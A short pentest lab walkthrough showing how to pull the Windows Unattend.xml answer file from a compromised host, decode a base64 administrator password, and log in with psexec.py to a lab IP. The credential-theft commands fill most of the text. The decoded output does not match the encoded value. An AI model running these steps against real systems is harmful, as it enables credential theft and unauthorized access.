# Credentials Dumping #### Passwords Configuration Files Windows configuration files can contain stored passwords, `e.g.` in the *Unattended Windows Setup* utility, used to mass deploy Windows on systems. * The configuration file can contain specific configurations and user account credentials * An attacker can find the configuration file left on the target after installation The utility typically utilizes those [files](https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/update-windows-settings-and-scripts-create-your-own-answer-file-sxs?view=windows-11): `C:\Windows\Panther\Unattend.xml` `C:\Windows\Panther\Autounattend.xml` * The stored passwords might be encoded in **`base64`** (easily decodable). ## #Exploitation After getting a meterpreter session or shell session follow the follwing technique:- * Manually search for the **`unattend.xml`** file, it should be inside * `C:\\Windows\\Panther` ``` cd C:\\Windows\\Panther dir download unattend.xml ```

* In a new terminal tab ``` cat unattend.xml ```

#### Get Access * `administrator` user configured base64 password is **`QWRtaW5AMTIz`** * Save it to a new file * Decode it using the `base64` tool ``` nano password.txt # paste the password, save and exit the file base64 -d password.txt Admin@123root ```

* Test the `administrator`:`Admin@123root` credentials with the `psexec` tool ``` psexec.py administrator@10.4.19.9 ``` You have gained access to the administrator account